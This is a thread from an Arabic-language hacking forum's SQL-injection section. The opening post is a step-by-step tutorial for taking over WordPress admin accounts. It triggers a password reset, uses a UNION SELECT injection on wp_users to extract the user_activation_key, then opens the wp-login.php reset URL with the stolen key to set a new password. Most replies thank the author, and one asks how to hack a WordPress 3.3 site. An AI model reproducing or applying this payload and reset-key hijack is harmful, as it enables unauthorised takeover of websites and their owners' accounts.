![]() |
![]() |
![]() |
التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"
مطلوب مشرفين على كامل اقسام المنتدى
|
|
![]() |
|
|
|
![]() |
|
| [ منتدى حـقن قواعد البيانات | Sql injcetion ] قسم يهتم باهم ثـغرات الحقن .. حقن قواعد البيانات واهم الطرق المستعملة في ذلـك , |
![]() |
|
|
أدوات الموضوع | انواع عرض الموضوع |
|
|
المشاركة رقم: 1 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||
شكراً: 75
تم شكره 12 مرة في 9 مشاركة
|
السلام عليكم ورحمة الله وبركاته معنا اليوم شرح لتخطي هاش سكربت WordPress اثناء عملية الحقن وهي عن طريق user_activation_key طيب بعد ما نسحب معلومات user password من قواعد البيانات نذهب الى لوحة التحكم ونضغط على Lost your password ![]() بعدين راح يطلب منك اليوزر او الايميل نضع الايميل ونضغط على Get new password ![]() بعد ذلك في اي عمود مصاب نضع كود PHP: كود:
group_concat(user_login,0x3a,user_activation_key) وأخر الرابط FROM wp_users يعني تسير الحقنه مثل كود PHP: كود:
-1 Union Select 1,2,3,group_concat(user_login,0x3a,user_activation_key),5,6,7,8,9,10,11,12,13,14 FROM wp_users والجدول wp_users << هذا جدول اليوزر الافتراضي في WordPress بعدها العمر راح يعطينا اليوزر و key مثل كود PHP: sH3LL:f7dZKaXuaH4Mf5gdJ7Cn user:sH3LL key:f7dZKaXuaH4Mf5gdJ7Cn طيب بعد ما سحبنا key نضيف الوصله بعد الرابط كود PHP: كود:
wp-login.php?action=rp&key=Key&login=user كود:
www.site.co/ كود:
wp-login.php?action=rp&key=key&login=user طيب نغير كلمة user الي في الوصله الى اليوزر الي سحبناه من القاعده ونغير كلمة Key في الوصله الى key الي سحبناه من القاعده مثال كود PHP: كود:
wp-login.php?action=rp&key=f7dZKaXuaH4Mf5gdJ7Cn&login=sH3LL بعدها انتر راح تجيك صفحة تعيين كلمة مرور الجديده ![]() دخل الباسورد الجديده ومبروك عليك ان شاء الله اكون افدتكم ولو بحاجه بسيطه وهذي حاجه بسيطه نقدمها لأعضاء هذا الصرح العظيم is-sec
التعديل الأخير تم بواسطة sH3LL ; 22/12/2012 الساعة 08:57 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
| 2 أعضاء قالوا شكراً لـ sH3LL على المشاركة المفيدة: |
ViRuS_Ra3cH (04/01/2014),
xdvb (01/01/2013)
|
|
|
المشاركة رقم: 2 | ||||||||||||
|
شرح ولا أروع يا أخي شل بارك الله فيك ننتظر المزيد من ابداعاتك تقبل مروري |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 3 | ||||||||||||
|
|||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 4 | ||||||||||||
|
شرح و لكن الطريقة ما اشتغلت معايا |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 5 | ||||||||||||
|
magelectric |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 6 | ||||||||||||
|
|||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 7 | ||||||||||||
|
بارك الله فيك اخي الكريم ننتظر منك الجديد |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 8 | ||||||||||||
|
ممكن طريقة إختراق موقع منصب سكريبت وردبريس3.3 |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 9 | ||||||||||||
|
بارک الله فيک |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 10 | ||||||||||||
|
b1 jouer une belle methode |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 11 | ||||||||||||
|
**** لك اخي فكرة جيدة وراح نطبقها عن قريب ان شاء الله |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 12 | ||||||||||||
|
**** على المروووور |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 13 | ||||||||||||
|
merciii mon frere<3 |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 14 | ||||||||||||
|
**** جزيلا |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 15 | ||||||||||||
|
[IMG][/IMG]
|
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 16 | ||||||||||||
|
يعطيك العافية |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 17 | ||||||||||||
|
**** لك ، بس الكثير يعاني منه هذا المشكل و خاصة الهاش وأيضا مشكل عدم ظهور Key |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 18 | ||||||||||||
|
مشكورررررررررررررر |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 19 | ||||||||||||
|
****ا جاري التطبيق تشكرر |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 20 | ||||||||||||
|
جميل اتمنى التوفيق للكل |
||||||||||||
|
|
||||||||||||
![]() |
| مواقع النشر (المفضلة) |
| حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف) | |
(أظهر الكل)
الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 56
|
|
| #حقو , Ahmed Egy Hack , Amazigh-Dz , asesino04 , مستر عبدالرحيم , barak-dz , br0xo , c41virus , ابو تالين , decomboy , devil ahmad , dimadz , drogba , DZ-cOmbattant , DZ-VII , dzkabyle , Endyke , fedex , gholoom , gthomps , h5ha , ha2010ha , hakers amiros , hardTARGET1234 , JE_HaCKeR , kinan , matrixx , midofahmey , moja4ed_fz , MoJrIm HaCkErS , Mr.MeDo , Mr.PERSIA , nabilove , NOIP , oss , PAL FALCON , Power_Dz , rayane888 , rhipla , SaBeR-Dz , sahir21 , SaMo_Dz , saqeer , SATLAM , sH3LL , Silencer Sense , simodz , TheMino , TitOu Dz , عبد الصمد. , عدنان.کورد , ViRuS_Ra3cH , WALAA.ALRAWI , xdvb , zizou dika , zizou12 |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| تخمين سكربت WordPress باستخدام مشروع M e t a sploit | S4wDz | [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] | 8 | 27/04/2013 02:10 |
| [ شرح ] : شرح عمل زوم اثناء تصوير ببرنامج كام ستوديو | Zoom with Cam Studio | ADMINISTRATOR | [ منتدى البرامج الكاملة والمشروحة ] | 0 | 08/09/2011 23:50 |
| حركة برايفت لتخطي الجدار الناري *_^ | MdMn HaCk3r | [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] | 3 | 21/01/2011 12:19 |
| إستغلال ثغرة الحقن في wordpress | Nassim0x09 | [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] | 4 | 15/01/2011 17:35 |
| طريقة جيدة لتخطي السيف مود ^_^ بالميتاسبوليت | MdMn HaCk3r | [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] | 3 | 26/12/2010 16:56 |
![]() |
![]() |
![]() |